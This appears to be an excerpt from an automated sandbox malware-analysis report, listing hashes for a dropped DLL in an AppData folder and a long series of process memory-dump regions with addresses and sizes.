SHA256 83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7
SHA512 565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4
-
\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\libfreetype-4.dll
MD5 96f1c8a9c83fbf6411f35d3de8fdc77c
SHA1 41b590133df449c8e0ce247aab7def7cfc39399d
SHA256 ae8db0fc9690c6047bd1d1aeb7cd254060c0623700bb184ce3f1b3d1daffc39e
SHA512 fa214f15b7c77eca2760aa2489debc5d7244f5535a7b725b49ae7f9ba6f5341a04ee2ccabe15f1e70a542582ed64758d1b4e2d61faaacf2a56e3ec750df76baa
-
memory/572-134-0x0000000000000000-mapping.dmp
-
memory/572-162-0x0000000005C50000-0x0000000005C51000-memory.dmp
Filesize 4KB
-
memory/572-173-0x0000000005E60000-0x0000000005E61000-memory.dmp
Filesize 4KB
-
memory/572-150-0x0000000005CA0000-0x0000000005CA1000-memory.dmp
Filesize 4KB
-
memory/572-148-0x0000000005C00000-0x0000000005C01000-memory.dmp
Filesize 4KB
-
memory/572-160-0x0000000005CE0000-0x0000000005CE1000-memory.dmp
Filesize 4KB
-
memory/572-145-0x0000000006270000-0x0000000006271000-memory.dmp
Filesize 4KB
-
memory/572-141-0x0000000077D20000-0x0000000077EAE000-memory.dmp
Filesize 1.6MB
-
memory/572-142-0x0000000000EE0000-0x0000000000EE1000-memory.dmp
Filesize 4KB
-
memory/900-170-0x0000000000000000-mapping.dmp
-
memory/900-181-0x0000000000400000-0x0000000000919000-memory.dmp
Filesize 5.1MB
-
memory/900-180-0x0000000000920000-0x00000000009CE000-memory.dmp
Filesize 696KB
-
memory/1068-612-0x0000000000000000-mapping.dmp
-
memory/1076-124-0x0000000000400000-0x00000000004D8000-memory.dmp
Filesize 864KB
-
memory/1076-118-0x0000000000000000-mapping.dmp
-
memory/1108-266-0x0000000009880000-0x0000000009881000-memory.dmp
Filesize 4KB
-
memory/1108-248-0x0000000002D10000-0x0000000002D11000-memory.dmp
Filesize 4KB
-
memory/1108-251-0x0000000002D12000-0x0000000002D13000-memory.dmp
Filesize 4KB
-
memory/1108-252-0x0000000007AA0000-0x0000000007AA1000-memory.dmp
Filesize 4KB
-
memory/1108-237-0x0000000000000000-mapping.dmp
-
memory/1108-638-0x0000000000000000-mapping.dmp
-
memory/1108-269-0x0000000002D13000-0x0000000002D14000-memory.dmp
Filesize 4KB
-
memory/1108-273-0x00000000093F0000-0x000000000954B000-memory.dmp
Filesize 1.4MB
-
memory/1112-626-0x0000000000000000-mapping.dmp
-
memory/1124-634-0x0000000000000000-mapping.dmp
-
memory/1196-674-0x0000000000000000-mapping.dmp
-
memory/1300-225-0x00000000003E0000-0x00000000003E9000-memory.dmp
Filesize 36KB
-
memory/1300-218-0x0000000000000000-mapping.dmp
-
memory/1300-226-0x00000000003D0000-0x00000000003DF000-memory.dmp
Filesize 60KB
-
memory/1516-632-0x0000000000000000-mapping.dmp
-
memory/1776-290-0x00000000041F0000-0x00000000041F1000-memory.dmp
Filesize 4KB
-
memory/1776-379-0x000000007ECB0000-0x000000007ECB1000-memory.dmp
Filesize 4KB
-
memory/1776-276-0x0000000000000000-mapping.dmp
-
memory/1776-297-0x0000000008D20000-0x0000000008D53000-memory.dmp
Filesize 204KB
-
memory/1776-380-0x00000000041F3000-0x00000000041F4000-memory.dmp
Filesize 4KB
-
memory/1776-291-0x00000000041F2000-0x00000000041F3000-memory.dmp
Filesize 4KB
-
memory/1800-604-0x0000000000000000-mapping.dmp
-
memory/2032-620-0x0000000000000000-mapping.dmp
-
memory/2044-636-0x0000000000000000-mapping.dmp
-
memory/2044-137-0x0000000000000000-mapping.dmp
-
memory/2044-163-0x00000000001C0000-0x00000000001FB000-memory.dmp
Filesize 236KB
-
memory/2044-165-0x0000000000400000-0x0000000000919000-memory.dmp
Filesize 5.1MB
-
memory/2092-624-0x0000000000000000-mapping.dmp
-
memory/2136-275-0x0000000000510000-0x0000000000519000-memory.dmp
Filesize 36KB
-
memory/2136-274-0x0000000000520000-0x0000000000525000-memory.dmp
Filesize 20KB
-
memory/2136-272-0x0000000000000000-mapping.dmp
-
memory/2204-174-0x0000000000000000-mapping.dmp
-
memory/2204-195-0x0000000000950000-0x0000000000A9A000-memory.dmp
Filesize 1.3MB
-
memory/2204-196-0x0000000000400000-0x0000000000946000-memory.dmp
Filesize 5.3MB
-
memory/2400-115-0x0000000000402E1A-mapping.dmp
-
memory/2400-114-0x0000000000400000-0x0000000000409000-memory.dmp
Filesize 36KB
-
memory/2440-259-0x0000000000000000-mapping.dmp
-
memory/2440-263-0x0000000000900000-0x0000000000909000-memory.dmp
Filesize 36KB
-
memory/2440-262-0x0000000002D50000-0x0000000002D54000-memory.dmp
Filesize 16KB
-
memory/2448-197-0x0000000004782000-0x0000000004783000-memory.dmp
Filesize 4KB
-
memory/2448-209-0x0000000007980000-0x0000000007981000-memory.dmp
Filesize 4KB
-
memory/2448-230-0x0000000009190000-0x0000000009191000-memory.dmp
Filesize 4KB
-
memory/2448-231-0x0000000008E50000-0x0000000008E51000-memory.dmp
Filesize 4KB
-
memory/2448-194-0x0000000004640000-0x0000000004641000-memory.dmp
Filesize 4KB
-
memory/2448-246-0x0000000004783000-0x0000000004784000-memory.dmp
Filesize 4KB
-
memory/2448-203-0x0000000004780000-0x0000000004781000-memory.dmp
Filesize 4KB
-
memory/2448-232-0x0000000008EC0000-0x0000000008EC1000-memory.dmp
Filesize 4KB
-
memory/2448-204-0x00000000070C0000-0x00000000070C1000-memory.dmp
Filesize 4KB
-
memory/2448-214-0x00000000081C0000-0x00000000081C1000-memory.dmp
Filesize 4KB
-
memory/2448-207-0x0000000007170000-0x0000000007171000-memory.dmp
Filesize 4KB
-
memory/2448-186-0x0000000000000000-mapping.dmp
-
memory/2448-208-0x0000000007AF0000-0x0000000007AF1000-memory.dmp
Filesize 4KB
-
memory/2448-198-0x0000000007200000-0x0000000007201000-memory.dmp
Filesize 4KB
-
memory/2448-206-0x00000000079A0000-0x00000000079A1000-memory.dmp
Filesize 4KB
-
memory/2608-587-0x0000000000000000-mapping.dmp
-
memory/2644-200-0x00000000055B0000-0x0000000005BB6000-memory.dmp
Filesize 6.0MB
-
memory/2644-179-0x0000000000000000-mapping.dmp
-
memory/2644-184-0x0000000000DA0000-0x0000000000DA1000-memory.dmp
Filesize 4KB
-
memory/2680-125-0x0000000000850000-0x000000000099A000-memory.dmp
Filesize 1.3MB
-
memory/2680-122-0x0000000000000000-mapping.dmp
-
memory/2724-152-0x0000000005A80000-0x0000000005A81000-memory.dmp
Filesize 4KB
-
memory/2724-144-0x0000000000000000-mapping.dmp
-
memory/2724-164-0x0000000005580000-0x0000000005A7E000-memory.dmp
Filesize 5.0MB
-
memory/2724-161-0x0000000005670000-0x0000000005671000-memory.dmp
Filesize 4KB
-
memory/2724-155-0x0000000005580000-0x0000000005581000-memory.dmp
Filesize 4KB
-
memory/2724-149-0x0000000000B60000-0x0000000000B61000-memory.dmp
Filesize 4KB
-
memory/2740-130-0x0000000000000000-mapping.dmp
-
memory/2740-133-0x0000000000880000-0x0000000000881000-memory.dmp
Filesize 4KB
-
memory/2792-211-0x0000000000190000-0x0000000000197000-memory.dmp
Filesize 28KB
-
memory/2792-212-0x0000000000180000-0x000000000018C000-memory.dmp
Filesize 48KB
-
memory/2792-205-0x0000000000000000-mapping.dmp
-
memory/2980-215-0x0000000000000000-mapping.dmp
-
memory/2980-216-0x0000000000800000-0x0000000000807000-memory.dmp
Filesize 28KB
-
memory/2980-217-0x00000000007F0000-0x00000000007FB000-memory.dmp
Filesize 44KB
-
memory/3008-117-0x00000000009C0000-0x00000000009D6000-memory.dmp
Filesize 88KB
-
memory/3092-177-0x00000000049E0000-0x0000000004A73000-memory.dmp
Filesize 588KB
-
memory/3092-178-0x0000000000400000-0x0000000002CB1000-memory.dmp
Filesize 40.7MB
-
memory/3092-166-0x0000000000000000-mapping.dmp
-
memory/3152-622-0x0000000000000000-mapping.dmp
-
memory/3224-245-0x0000000000330000-0x0000000000339000-memory.dmp
Filesize 36KB
-
memory/3224-227-0x0000000000000000-mapping.dmp
-
memory/3224-244-0x0000000000340000-0x0000000000345000-memory.dmp
Filesize 20KB
-
memory/3412-201-0x0000000003070000-0x00000000030E4000-memory.dmp
Filesize 464KB
-
memory/3412-190-0x0000000000000000-mapping.dmp
-
memory/3412-202-0x0000000003000000-0x000000000306B000-memory.dmp
Filesize 428KB
-
memory/3412-660-0x0000000000000000-mapping.dmp
-
memory/3452-270-0x0000000000680000-0x0000000000685000-memory.dmp
Filesize 20KB
-
memory/3452-268-0x0000000000000000-mapping.dmp
-
memory/3452-271-0x00000000003F0000-0x00000000003F9000-memory.dmp
Filesize 36KB
-
memory/3588-153-0x0000000000000000-mapping.dmp
-
memory/3676-616-0x0000000000000000-mapping.dmp
-
memory/3972-116-0x0000000000030000-0x000000000003A000-memory.dmp
Filesize 40KB
-
memory/4016-132-0x0000000000400000-0x00000000004D8000-memory.dmp
Filesize 864KB
-
memory/4016-126-0x0000000000000000-mapping.dmp
-
memory/4088-670-0x0000000000000000-mapping.dmp
-
memory/4092-249-0x0000000000000000-mapping.dmp
-
memory/4092-261-0x0000000000330000-0x000000000033C000-memory.dmp
Filesize 48KB
-
memory/4092-260-0x0000000000340000-0x0000000000346000-memory.dmp
Filesize 24KB
-
memory/4124-662-0x0000000000000000-mapping.dmp
-
memory/4124-673-0x0000000004D90000-0x0000000004E2C000-memory.dmp
Filesize 624KB
-
memory/4168-596-0x0000000000000000-mapping.dmp
-
memory/4204-614-0x0000000000000000-mapping.dmp
-
memory/4312-540-0x000000000044003F-mapping.dmp
-
memory/4312-542-0x0000000000400000-0x0000000000495000-memory.dmp
Filesize 596KB
-
memory/4320-600-0x0000000000000000-mapping.dmp
-
memory/4416-618-0x0000000000000000-mapping.dmp
-
memory/4444-642-0x0000000000000000-mapping.dmp
-
memory/4460-608-0x0000000000000000-mapping.dmp
-
memory/4604-630-0x0000000000000000-mapping.dmp
-
memory/4640-543-0x0000000000000000-mapping.dmp
-
memory/4696-640-0x0000000000000000-mapping.dmp
-
memory/4700-549-0x0000000000000000-mapping.dmp
-
memory/4740-570-0x0000000005400000-0x00000000058FE000-memory.dmpFilesize
5.0MB
-
memory/4740-553-0x0000000000000000-mapping.dmp
-
memory/4752-646-0x0000000000000000-mapping.dmp
-
memory/4784-654-0x0000000005410000-0x000000000590E000-memory.dmpFilesize
5.0MB
-
memory/4784-648-0x000000000047B92E-mapping.dmp
-
memory/4792-628-0x000001BAE6E30000-0x000001BAE6E50000-memory.dmpFilesize
128KB
-
memory/4792-629-0x000001BAE6E50000-0x000001BAE6E70000-memory.dmpFilesize
128KB
-
memory/4792-591-0x000001BAE6E10000-0x000001BAE6E30000-memory.dmpFilesize
128KB
-
memory/4792-578-0x00007FFBCDFD0000-0x00007FFBCDFD2000-memory.dmpFilesize
8KB
-
memory/4792-559-0x0000000000000000-mapping.dmp
-
memory/4816-563-0x0000000000000000-mapping.dmp
-
memory/4888-572-0x0000000000000000-mapping.dmp
-
memory/4904-657-0x0000000000000000-mapping.dmp
-
memory/4916-655-0x0000000000000000-mapping.dmp
-
memory/4940-579-0x0000000000000000-mapping.dmp
-
memory/5076-583-0x0000000000000000-mapping.dmp
-
memory/5108-530-0x0000000000000000-mapping.dmp
-
memory/5116-592-0x0000000000000000-mapping.dmp